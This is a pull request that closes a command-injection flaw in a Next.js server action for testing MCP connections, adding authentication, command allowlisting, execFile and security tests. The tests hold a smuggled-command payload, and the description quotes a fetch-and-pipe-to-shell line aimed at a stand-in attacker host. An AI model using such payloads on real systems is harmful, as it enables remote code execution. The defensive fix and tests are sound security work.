### PR TITLE
security: close command injection in testMcpConnection

### DIFF
--- a/app/actions/test-mcp-connection.ts
+++ b/app/actions/test-mcp-connection.ts
@@ -3,7 +3,8 @@
 import { z } from 'zod';
 
 import { McpServerType } from '@/db/schema';
-import { validateHeaders } from '@/lib/security/validators';
+import { requireAuthUserId } from '@/lib/require-auth';
+import { validateCommand, validateCommandArgs, validateHeaders } from '@/lib/security/validators';
 
 const testConfigSchema = z.object({
   name: z.string().min(1),
@@ -107,6 +108,18 @@ function checkForCorsNetworkError(error: unknown): { corsIssue?: boolean; corsDe
 }
 
 export async function testMcpConnection(config: TestConfig): Promise<TestResult> {
+  // Every sibling action in this codebase requires a session; this one had no
+  // auth check at all while spawning a child process from caller input.
+  try {
+    await requireAuthUserId();
+  } catch {
+    return {
+      success: false,
+      messageKey: 'mcpServers.test.authRequired',
+      details: { error: 'Authentication required' },
+    };
+  }
+
   try {
     // Validate input
     const validated = testConfigSchema.parse(config);
@@ -420,15 +433,41 @@ export async function testMcpConnection(config: TestConfig): Promise<TestResult>
 
     // For STDIO servers
     if (validated.command && validated.type === McpServerType.STDIO) {
+      // The command reaches a child process below, so it goes through the same
+      // allowlist every other STDIO path uses. This file previously imported
+      // only validateHeaders and interpolated the command into a shell string.
+      const commandCheck = validateCommand(validated.command);
+      if (!commandCheck.valid) {
+        return {
+          success: false,
+          messageKey: 'mcpServers.test.invalidConfig',
+          details: { error: commandCheck.error },
+        };
+      }
+      if (validated.args) {
+        const argsCheck = validateCommandArgs(validated.args);
+        if (!argsCheck.valid) {
+          return {
+            success: false,
+            messageKey: 'mcpServers.test.invalidConfig',
+            details: { error: argsCheck.error },
+          };
+        }
+      }
+
       // Check if the command exists
-      const { exec } = await import('child_process');
+      const { execFile } = await import('child_process');
       const { promisify } = await import('util');
-      const execPromise = promisify(exec);
+      const execFileAsync = promisify(execFile);
 
       try {
-        // Try to check if the command is available
-        const checkCommand = validated.command === 'npx' ? 'npx --version' : `which ${validated.command}`;
-        await execPromise(checkCommand);
+        // argv, never a shell: `which ${command}` through exec() was a command
+        // injection sink for any caller who could reach this action.
+        if (validated.command === 'npx') {
+          await execFileAsync('npx', ['--version']);
+        } else {
+          await execFileAsync('which', [validated.command]);
+        }
 
         // If it's npx with a package, we can't easily verify without installing
         if (validated.command === 'npx' && validated.args?.[0]) {

--- a/tests/integration/context7.test.ts
+++ b/tests/integration/context7.test.ts
@@ -1,6 +1,10 @@
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 
 import { testMcpConnection } from '@/app/actions/test-mcp-connection';
+
+// testMcpConnection spawns a child process, so it now requires a session.
+vi.mock('next-auth', () => ({ getServerSession: vi.fn(async () => ({ user: { id: 'test-user' } })) }));
+vi.mock('@/lib/auth', () => ({ authOptions: {}, getAuthSession: vi.fn() }));
 import { McpServerType } from '@/db/schema';
 
 // Mock fetch globally

--- a/tests/security/test-mcp-connection.test.ts
+++ b/tests/security/test-mcp-connection.test.ts
@@ -1,0 +1,66 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+vi.mock('child_process', () => {
+  const exec = vi.fn((_c: string, _o: any, cb: any) => (typeof cb === 'function' ? cb : _o)(null, { stdout: '', stderr: '' }));
+  const execFile = vi.fn((_f: string, _a: string[], _o: any, cb: any) => (typeof cb === 'function' ? cb : _o)(null, { stdout: '/usr/bin/x', stderr: '' }));
+  return { exec, execFile, default: { exec, execFile } };
+});
+vi.mock('next-auth', () => ({ getServerSession: vi.fn() }));
+vi.mock('@/lib/auth', () => ({ authOptions: {}, getAuthSession: vi.fn() }));
+
+const { getServerSession } = vi.mocked(await import('next-auth'));
+const { exec, execFile } = vi.mocked(await import('child_process'));
+const { testMcpConnection } = await import('@/app/actions/test-mcp-connection');
+const { McpServerType } = await import('@/db/schema');
+
+const PAYLOAD = 'x; touch /tmp/PWNED #';
+
+function stdio(command: string) {
+  return { name: 'test', type: McpServerType.STDIO, command, args: [] } as any;
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  getServerSession.mockResolvedValue({ user: { id: 'user-1' } } as any);
+});
+
+describe('testMcpConnection STDIO command handling', () => {
+  it('never hands the command to a shell', async () => {
+    await testMcpConnection(stdio(PAYLOAD)).catch(() => undefined);
+
+    expect(exec).not.toHaveBeenCalled();
+    for (const call of execFile.mock.calls) {
+      expect(String(call[0])).not.toContain(PAYLOAD);
+    }
+  });
+
+  it('rejects a command carrying shell metacharacters', async () => {
+    const result = await testMcpConnection(stdio(PAYLOAD));
+
+    expect(result.success).toBe(false);
+    expect(execFile).not.toHaveBeenCalled();
+  });
+
+  it('rejects a command outside the allowlist', async () => {
+    const result = await testMcpConnection(stdio('curl'));
+
+    expect(result.success).toBe(false);
+    expect(execFile).not.toHaveBeenCalled();
+  });
+
+  it('refuses an unauthenticated caller before touching the command', async () => {
+    getServerSession.mockResolvedValue(null as any);
+
+    const result = await testMcpConnection(stdio('npx'));
+
+    expect(result.success).toBe(false);
+    expect(exec).not.toHaveBeenCalled();
+    expect(execFile).not.toHaveBeenCalled();
+  });
+
+  it('still accepts an allowlisted command', async () => {
+    const result = await testMcpConnection(stdio('npx'));
+
+    expect(result.success).toBe(true);
+  });
+});


### PR DESCRIPTION
Second command-injection sink, in a file #204 never touched.

```ts
const checkCommand = validated.command === 'npx'
  ? 'npx --version'
  : `which ${validated.command}`;
await execPromise(checkCommand);          // promisify(exec) -> /bin/sh -c
```

`command` is declared `z.string().optional()` — no allowlist, no format constraint — so `command: "x; curl attacker.example/s | sh"` executes as two shell statements. The file imported only `validateHeaders`; `validateCommand` and `validateCommandArgs`, which `app/actions/mcp-servers.ts` calls on every equivalent path, were never imported here. It also had **no auth check at all**, in a `'use server'` file that spawns a child process.

## The fix

- `which` runs through `execFile` with an argv array; `npx --version` likewise.
- `validateCommand` (allowlist plus metacharacter check) and `validateCommandArgs` run before anything is spawned.
- `requireAuthUserId()` at the top, matching every sibling action.

Error returns reuse `mcpServers.test.authRequired` and `mcpServers.test.invalidConfig`, both already present in all six locales — no new translation work.

## Reachability, corrected

The finding claimed a fully anonymous visitor. The revalidation judge checked and corrected that: the shipped UI entry point is `smart-server-dialog.tsx` on `/mcp-servers`, whose prefix is in `middleware.ts`'s `protectedRoutes`, so an anonymous request is redirected to `/login`. It also found that the other cited entry point, `intelligent-server-dialog.tsx`, is dead code with zero importers.

So: one free self-service account, not zero. The RCE itself is unchanged.

## Where it came from

The deepsec revalidation pass over the 30 CRITICAL findings, run against current `main` after today's four security deploys. That pass reported **TP 50, FP 1, Fixed 7** across 58 findings — the seven Fixed being today's work, which is also the check that the judge is reading current code rather than confirming everything put in front of it.

## Tests

Five: no shell is used at all, a metacharacter command is rejected before spawning, a non-allowlisted command is rejected, an unauthenticated caller is refused before the command is touched, and an allowlisted command still succeeds.

`tests/integration/context7.test.ts` calls this action and needed a session mock; added. Its two pre-existing failures are unchanged.

Suite: 203 failing before, 203 after, no file regressed. `tsc` clean, no new lint findings.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/VeriTeknik/codesmith/pluggedin-app/pr/208"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1790867965&installation_model_id=430597&pr_number=208&repository=VeriTeknik%2Fpluggedin-app&return_to=https%3A%2F%2Fgithub.com%2FVeriTeknik%2Fpluggedin-app%2Fpull%2F208&signature=0c777cc220e06d4618095272c95927200ca920ceeade2c3dcd5f1e1beefd5439"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>@codesmith-bot</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

## Summary by Sourcery

Secure MCP connection testing against command injection and unauthenticated child-process execution.

Bug Fixes:
- Prevent command injection in MCP connection tests by validating commands and arguments before execution and avoiding shell-based command invocation.
- Require authentication before testing MCP connections that may spawn child processes.

Tests:
- Add security coverage for shell avoidance, command validation, authentication enforcement, and successful allowlisted commands.
- Update integration tests with an authenticated session mock.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * MCP connection testing now requires authentication.
  * Improved validation for STDIO commands and arguments.
  * Prevented unsafe shell command execution and rejected unsupported or potentially harmful commands.
  * Continued support for approved commands.

* **Tests**
  * Added coverage for authentication, command validation, and secure process execution.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->